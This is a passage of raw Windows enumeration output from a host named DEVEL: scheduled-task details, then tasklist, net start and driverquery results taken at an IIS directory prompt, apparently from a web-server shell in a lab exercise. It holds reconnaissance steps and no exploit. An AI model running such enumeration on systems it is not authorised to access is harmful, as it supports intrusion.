Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           31/3/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        1 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Shell
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Notifications for actions taken by Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:03
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Migration for Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SideShow
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\AutoWake
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\GadgetManager
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SessionAgent
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:17:56
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:18:11
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SystemRestore
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           12:00:00
Start Date:                           14/6/2005
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Tcpip
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\TextServicesFramework
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              TextServicesFramework monitor task
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Time Synchronization
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Start In:                             N/A
Comment:                              Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Windows Error Reporting
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        18/3/2017 1:08:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\wermgr.exe -queuereporting
Start In:                             N/A
Comment:                              Windows Error Reporting task to process queued reports.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Filtering Platform
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In:                             N/A
Comment:                              This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Media Sharing
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In:                             N/A
Comment:                              This task updates the cached list of folders and the security permissions on any new files in a user?s shared media library.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\WindowsBackup
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time:                        14/9/2019 10:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In:                             N/A
Comment:                              This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           10:00:00
Start Date:                           24/3/2017
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\WindowsColorSystem
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows Defender
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time:                        14/9/2019 3:11:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In:                             N/A
Comment:                              Scheduled Scan
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:11:42
Start Date:                           1/1/2000
End Date:                             1/1/2100
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       264 N/A
csrss.exe                      344 N/A
wininit.exe                    384 N/A
csrss.exe                      396 N/A
winlogon.exe                   452 N/A
services.exe                   488 N/A
lsass.exe                      496 SamSs
lsm.exe                        504 N/A
svchost.exe                    608 DcomLaunch, PlugPlay, Power
svchost.exe                    672 RpcEptMapper, RpcSs
svchost.exe                    724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe                    792 N/A
svchost.exe                    832 AudioEndpointBuilder, CscService, SysMain,
                                   TrkWks, UxSms
svchost.exe                    888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
                                   ProfSvc, Schedule, SENS, Themes, Winmgmt,
                                   wuauserv
svchost.exe                   1000 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe                   1072 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
spoolsv.exe                   1184 Spooler
svchost.exe                   1220 BFE, DPS, MpsSvc
svchost.exe                   1320 AppHostSvc
svchost.exe                   1392 FDResPub
svchost.exe                   1424 ftpsvc
VGAuthService.exe             1512 VGAuthService
vmtoolsd.exe                  1540 VMTools
svchost.exe                   1572 W3SVC, WAS
WmiPrvSE.exe                  2020 N/A
msdtc.exe                     1632 MSDTC
sppsvc.exe                    2696 sppsvc
svchost.exe                   2736 WinDefend
SearchIndexer.exe             2816 WSearch
TrustedInstaller.exe          3948 TrustedInstaller
w3wp.exe                      2584 N/A
cmd.exe                       3928 N/A
conhost.exe                   1240 N/A
tasklist.exe                  1052 N/A

c:\windows\system32\inetsrv>net start
net start
These Windows services are started:

   Application Experience
   Application Host Helper Service
   Base Filtering Engine
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IP Helper
   Microsoft FTP Service
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Security Center
   Server
   Software Protection
   SPP Notification Service
   Superfetch
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Modules Installer
   Windows Process Activation Service
   Windows Search
   Windows Time
   Windows Update
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   World Wide Web Publishing Service

The command completed successfully.


c:\windows\system32\inetsrv> DRIVERQUERY
 DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:59
ACPI         Microsoft ACPI Driver  Kernel        14/7/2009 2:11:11
AcpiPmi      ACPI Power Meter Drive Kernel        14/7/2009 2:16:36
adp94xx      adp94xx                Kernel        6/12/2008 1:59:55
adpahci      adpahci                Kernel        1/5/2007 8:29:26
adpu320      adpu320                Kernel        28/2/2007 2:03:08
AFD          Ancillary Function Dri Kernel        14/7/2009 2:12:34
agp440       Intel AGP Bus Filter   Kernel        14/7/2009 2:25:36
aic78xx      aic78xx                Kernel        12/4/2006 3:20:11
aliide       aliide                 Kernel        14/7/2009 2:11:17
amdagp       AMD AGP Bus Filter Dri Kernel        14/7/2009 2:25:36
amdide       amdide                 Kernel        14/7/2009 2:11:19
AmdK8        AMD K8 Processor Drive Kernel        14/7/2009 2:11:03
AmdPPM       AMD Processor Driver   Kernel        14/7/2009 2:11:03
amdsata      amdsata                Kernel        19/5/2009 8:54:22
amdsbs       amdsbs                 Kernel        20/3/2009 8:35:26
amdxata      amdxata                Kernel        19/5/2009 8:57:35
AppID        AppID Driver           Kernel        14/7/2009 2:36:51
arc          arc                    Kernel        25/5/2007 12:31:06
arcsas       arcsas                 Kernel        14/1/2009 9:26:37
AsyncMac     RAS Asynchronous Media Kernel        14/7/2009 2:54:46
atapi        IDE Channel            Kernel        14/7/2009 2:11:15
b06bdrv      Broadcom NetXtreme II  Kernel        14/2/2009 12:10:59
b57nd60x     Broadcom NetXtreme Gig Kernel        26/4/2009 2:15:34
Beep         Beep                   Kernel        14/7/2009 2:45:00
blbdrive     blbdrive               Kernel        14/7/2009 2:23:04
bowser       Browser Support Driver File System   14/7/2009 2:14:21
BrFiltLo     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
BrFiltUp     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
Brserid      Brother MFC Serial Por Kernel        7/8/2006 12:33:50
BrSerWdm     Brother WDM Serial dri Kernel        7/8/2006 12:33:44
BrUsbMdm     Brother MFC USB Fax On Kernel        7/8/2006 12:33:43
BrUsbSer     Brother MFC USB Serial Kernel        9/8/2006 3:02:02
BTHMODEM     Bluetooth Serial Commu Kernel        14/7/2009 2:51:34
cdfs         CD/DVD File System Rea File System   14/7/2009 2:11:14
cdrom        CD-ROM Driver          Kernel        14/7/2009 2:11:24
circlass     Consumer IR Devices    Kernel        14/7/2009 2:51:17
CLFS         Common Log (CLFS)      Kernel        14/7/2009 2:11:10
CmBatt       Microsoft AC Adapter D Kernel        14/7/2009 2:19:18
cmdide       cmdide                 Kernel        14/7/2009 2:11:18
CNG          CNG                    Kernel        14/7/2009 2:32:55
Compbatt     Microsoft Composite Ba Kernel        14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel        14/7/2009 2:45:26
crcdisk      Crcdisk Filter Driver  Kernel        14/7/2009 2:46:05
CSC          Offline Files Driver   Kernel        14/7/2009 2:15:08
DfsC         DFS Namespace Client D File System   14/7/2009 2:14:16
discache     System Attribute Cache Kernel        14/7/2009 2:24:04
Disk         Disk Driver            Kernel        14/7/2009 2:11:28
DXGKrnl      LDDM Graphics Subsyste Kernel        14/7/2009 2:26:15
E1G60        Intel(R) PRO/1000 NDIS Kernel        29/5/2008 2:14:11
ebdrv        Broadcom NetXtreme II  Kernel        31/12/2008 6:06:23
elxstor      elxstor                Kernel        4/2/2009 12:09:33
ErrDev       Microsoft Hardware Err Kernel        14/7/2009 2:19:18
exfat        exFAT File System Driv File System   14/7/2009 2:14:01
fastfat      FAT12/16/32 File Syste File System   14/7/2009 2:14:01
fdc          Floppy Disk Controller Kernel        14/7/2009 2:45:45
FileInfo     File Information FS Mi File System   14/7/2009 2:21:51
Filetrace    Filetrace              File System   14/7/2009 2:15:29
flpydisk     Floppy Disk Driver     Kernel        14/7/2009 2:45:45
FltMgr       FltMgr                 File System   14/7/2009 2:11:13
FsDepends    File System Dependency File System   14/7/2009 2:15:38
fvevol       Bitlocker Drive Encryp Kernel        14/7/2009 2:13:01
gagp30kx     Microsoft Generic AGPv Kernel        14/7/2009 2:25:42
hcw85cir     Hauppauge Consumer Inf Kernel        11/5/2009 10:22:41
HDAudBus     Microsoft UAA Bus Driv Kernel        14/7/2009 2:50:55
HidBatt      HID UPS Battery Driver Kernel        14/7/2009 2:19:21
HidBth       Microsoft Bluetooth HI Kernel        14/7/2009 2:51:33
HidIr        Microsoft Infrared HID Kernel        14/7/2009 2:51:04
HidUsb       Microsoft HID Class Dr Kernel        14/7/2009 2:51:04
HpSAMD       HpSAMD                 Kernel        19/5/2009 2:42:46
HTTP         HTTP                   Kernel        14/7/2009 2:12:53
hwpolicy     Hardware Policy Driver Kernel        14/7/2009 2:11:01
i8042prt     i8042 Keyboard and PS/ Kernel        14/7/2009 2:11:23
iaStorV      iaStorV                Kernel        8/4/2009 7:54:58
iirsp        iirsp                  Kernel        13/12/2005 11:48:01
intelide     intelide               Kernel        14/7/2009 2:11:19
intelppm     Intel Processor Driver Kernel        14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel        14/7/2009 2:54:28
IPMIDRV      IPMIDRV                Kernel        14/7/2009 2:30:59
IPNAT        IP Network Address Tra Kernel        14/7/2009 2:54:28
IRENUM       IR Bus Enumerator      Kernel        14/7/2009 2:53:27
isapnp       isapnp                 Kernel        14/7/2009 2:19:29
iScsiPrt     iScsiPort Driver       Kernel        14/7/2009 2:46:21
kbdclass     Keyboard Class Driver  Kernel        14/7/2009 2:11:15
kbdhid       Keyboard HID Driver    Kernel        14/7/2009 2:45:09
KSecDD       KSecDD                 Kernel        14/7/2009 2:11:56
KSecPkg      KSecPkg                Kernel        14/7/2009 2:34:00
lltdio       Link-Layer Topology Di Kernel        14/7/2009 2:53:18
LSI_FC       LSI_FC                 Kernel        10/12/2008 12:28:47
LSI_SAS      LSI_SAS                Kernel        19/5/2009 3:19:55
LSI_SAS2     LSI_SAS2               Kernel        19/5/2009 3:31:29
LSI_SCSI     LSI_SCSI               Kernel        17/4/2009 1:14:47
luafv        UAC File Virtualizatio File System   14/7/2009 2:15:44
megasas      megasas                Kernel        19/5/2009 4:09:36
MegaSR       MegaSR                 Kernel        19/5/2009 4:25:17
Modem        Modem                  Kernel        14/7/2009 2:55:24
monitor      Microsoft Monitor Clas Kernel        14/7/2009 2:25:58
mouclass     Mouse Class Driver     Kernel        14/7/2009 2:11:15
mouhid       Mouse HID Driver       Kernel        14/7/2009 2:45:08
mountmgr     Mount Point Manager    Kernel        14/7/2009 2:11:27
mpio         mpio                   Kernel        14/7/2009 2:46:13
mpsdrv       Windows Firewall Autho Kernel        14/7/2009 2:52:52
MRxDAV       WebDav Client Redirect File System   14/7/2009 2:14:25
mrxsmb       SMB MiniRedirector Wra File System   14/7/2009 2:14:24
mrxsmb10     SMB 1.x MiniRedirector File System   14/7/2009 2:14:34
mrxsmb20     SMB 2.0 MiniRedirector File System   14/7/2009 2:14:29
msahci       msahci                 Kernel        14/7/2009 2:45:50
msdsm        msdsm                  Kernel        14/7/2009 2:46:19
Msfs         Msfs                   File System   14/7/2009 2:11:26
mshidkmdf    Pass-through HID to KM Kernel        14/7/2009 2:51:07
msisadrv     msisadrv               Kernel        14/7/2009 2:11:09
MsRPC        MsRPC                  Kernel        14/7/2009 2:11:59
mssmbios     Microsoft System Manag Kernel        14/7/2009 2:19:25
MTConfig     Microsoft Input Config Kernel        14/7/2009 2:46:55
Mup          Mup                    File System   14/7/2009 2:14:14
NativeWifiP  NativeWiFi Filter      Kernel        14/7/2009 2:51:59
NDIS         NDIS System Driver     Kernel        14/7/2009 2:12:24
NdisCap      NDIS Capture LightWeig Kernel        14/7/2009 2:52:44
NdisTapi     Remote Access NDIS TAP Kernel        14/7/2009 2:54:24
Ndisuio      NDIS Usermode I/O Prot Kernel        14/7/2009 2:53:51
NdisWan      Remote Access NDIS WAN Kernel        14/7/2009 2:54:34
NDProxy      NDIS Proxy             Kernel        14/7/2009 2:54:27
NetBIOS      NetBIOS Interface      File System   14/7/2009 2:53:54
NetBT        NetBT                  Kernel        14/7/2009 2:12:18
nfrd960      nfrd960                Kernel        7/6/2006 12:12:15
Npfs         Npfs                   File System   14/7/2009 2:11:31
nsiproxy     NSI proxy service driv Kernel        14/7/2009 2:12:08
Ntfs         Ntfs                   File System   14/7/2009 2:12:05
Null         Null                   Kernel        14/7/2009 2:11:12
nvraid       nvraid                 Kernel        20/5/2009 9:43:36
nvstor       nvstor                 Kernel        20/5/2009 9:44:09
